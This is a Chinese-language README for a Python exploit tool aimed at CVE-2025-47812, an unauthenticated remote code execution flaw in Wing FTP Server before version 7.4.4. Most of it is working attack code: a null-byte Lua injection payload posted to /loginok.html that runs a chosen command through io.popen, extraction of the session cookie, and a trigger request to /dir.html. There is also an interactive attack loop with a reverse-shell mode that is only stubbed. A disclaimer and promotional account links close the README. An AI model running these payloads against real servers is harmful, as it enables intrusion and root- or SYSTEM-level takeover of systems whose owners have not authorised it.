项目标题与描述
CVE-2025-47812 - Wing FTP Server RCE 漏洞利用工具
本项目是一个针对Wing FTP Server(版本7.4.4之前)中发现的**关键远程代码执行(RCE)**漏洞(CVE-2025-47812)的Python利用工具。该漏洞源于服务器认证逻辑中对用户名参数中空字节(\0)的错误处理,攻击者可通过注入Lua代码实现未经认证的远程命令执行,并在目标系统上以SYSTEM(Windows)或root(Linux/macOS)权限运行代码。
功能特性
- 双模式利用:提供直接命令执行与反向Shell获取两种攻击方式。
- 跨平台兼容:支持攻击运行在Windows、Linux及macOS上的易受攻击Wing FTP Server实例。
- 自动化会话管理:自动从服务器响应中提取UID会话凭证并用于后续请求。
- 自定义载荷:允许用户灵活指定要执行的系统命令,实现高度定制化攻击。
- 详细日志输出:提供清晰的请求/响应信息,便于调试与分析攻击过程。
- 认证旁路:可利用
anonymous等用户名在无需有效凭证的情况下实施攻击。
安装指南
该工具为Python脚本,无需复杂安装。
系统要求:
- Python 3.x
requests库
依赖安装:
# 安装必需的Python库pipinstallrequests# 或通过requirements.txt安装(如有)pipinstall-r requirements.txt平台注意事项:
- 该工具本身可在任何安装Python的操作系统上运行。
- 目标必须是运行Wing FTP Server版本<7.4.4的系统。
- 确保攻击机与目标服务器之间存在网络可达性。
使用说明
基础使用示例
运行脚本后,按提示交互操作:
python3 CVE-2025-47812.py程序将引导您输入:
- 目标URL(如:
http://10.10.10.10:5466) - 用户名(如:
anonymous) - 攻击模式选择(1-执行命令,2-获取反向Shell)
- 具体命令(模式1时输入)
典型攻击流程
- 信息收集:确定目标Wing FTP Server的版本及可访问的管理接口。
- 漏洞探测:尝试使用
anonymous用户名访问登录端点。 - 命令执行:通过注入的Lua代码运行
id、whoami等命令验证漏洞。 - 权限提升:利用获取的系统权限执行进一步操作。
API接口概览
该工具主要与以下Wing FTP Server端点交互:
/loginok.html:POST请求提交恶意用户名载荷,获取UID会话Cookie。/dir.html:携带UID Cookie的GET请求,触发会话文件处理并执行注入的代码。
核心代码
1. UID与恶意Cookie获取函数
此函数构造包含Lua代码注入的用户名参数,向/loginok.html发送POST请求以获取有效的UID会话凭证。
defget_uid_cookie(session,base_url,username,command):""" 通过Lua代码注入获取Wing FTP Server的UID会话Cookie 参数: session: requests.Session对象 base_url: 目标服务器基础URL username: 用于注入的基础用户名 command: 要执行的系统命令 返回: 成功时返回UID字符串,失败返回None """url=f"{base_url}/loginok.html"headers={"Content-Type":"application/x-www-form-urlencoded","User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36","Origin":base_url,"Referer":f"{base_url}/login.html",# ... 其他请求头省略}# 关键注入点:在用户名中插入空字节和Lua代码encoded_username=quote(username)payload=(f"username={encoded_username}%00]]%0dlocal+h+%3d+io.popen(\"{command}\")""%0dlocal+r+%3d+h%3aread(\"*a\")""%0dh%3aclose()%0dprint(r)%0d--&password=")print(f"[*] 尝试获取UID... 载荷:{command}")try:response=session.post(url,data=payload,headers=headers)set_cookie=response.headers.get("Set-Cookie","")# 从Set-Cookie头中提取UID值match=re.search(r"UID=([a-f0-9]+)",set_cookie)ifmatch:uid=match.group(1)print(f"[+] UID获取成功:{uid}")returnuidelse:print("[-] 未找到UID!")returnNoneexceptExceptionase:print(f"[-] 发生错误:{e}")returnNone2. 漏洞触发与命令执行函数
此函数使用获取的UID向/dir.html发送请求,触发服务器处理包含恶意Lua代码的会话文件,从而实现远程代码执行。
defpost_to_dir(session,base_url,uid):""" 向/dir.html端点发送请求触发RCE 参数: session: 携带UID Cookie的requests.Session对象 base_url: 目标服务器基础URL uid: 从get_uid_cookie获取的会话ID 返回: 服务器的响应内容,包含命令执行结果 """url=f"{base_url}/dir.html"headers={"Content-Type":"application/x-www-form-urlencoded",# 设置Cookie头,携带有效的UID会话"Cookie":f"UID={uid}","User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36",# ... 其他请求头省略}print(f"[*] 发送 /dir.html 请求...")try:response=session.get(url,headers=headers)print(f"[*] HTTP{response.status_code}")# 输出原始响应,其中包含命令执行结果print("------ 响应开始 ------")print(response.text)print("------ 响应结束 ------")returnresponse.textexceptExceptionase:print(f"[-] 请求失败:{e}")returnNone3. 漏洞利用流程主逻辑
# 主程序交互逻辑(基于提供的信息重构)defmain():""" 漏洞利用工具主函数 协调整个攻击流程:目标输入、模式选择、载荷生成与执行 """print("="*60)print(" CVE-2025-47812 - Wing FTP Server RCE Exploit")print("="*60)# 1. 获取目标信息target_url=input("目标URL (例如: http://localhost:5466): ")username=input("用户名 (例如: anonymous): ")# 2. 选择攻击模式print("1) 执行命令")print("2) 获取反向Shell")choice=input("请选择 (1 或 2): ")# 3. 根据模式执行相应操作ifchoice=="1":# 命令执行模式command=input("要执行的命令 (默认: whoami): ")or"whoami"# 创建会话并获取UIDsession=requests.Session()uid=get_uid_cookie(session,target_url,username,command)ifuid:# 触发漏洞执行命令post_to_dir(session,target_url,uid)elifchoice=="2":# 反向Shell模式(需根据实际情况实现)print("[!] 反向Shell功能需根据目标环境定制实现")# 此处可扩展实现nc、bash、powershell等反向Shellelse:print("[-] 无效选择")免责声明:本工具仅用于教育目的与合法的安全研究。请仅在您拥有明确测试权限的系统上使用。作者不对任何滥用或由此工具造成的损害负责。
6HFtX5dABrKlqXeO5PUv/ydjQZDJ7Ct83xG1NG8fcAPxOjJ5m5ttnEWSXfJFj0OX
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)
